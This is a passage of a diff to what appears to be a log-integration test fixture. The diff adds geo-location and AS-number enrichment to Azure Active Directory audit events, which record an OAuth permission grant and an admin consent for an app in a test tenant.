\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17472,6 +18576,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -17638,7 +18754,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125374Z", + "ingested": "2021-12-14T14:48:43.176742709Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17665,6 +18781,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -17834,7 +18962,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125380300Z", + "ingested": "2021-12-14T14:48:43.176743236Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17861,6 +18989,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -18030,7 +19170,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125386800Z", + "ingested": "2021-12-14T14:48:43.176743809Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18057,6 +19197,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -18226,7 +19378,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125393200Z", + "ingested": "2021-12-14T14:48:43.176744430Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 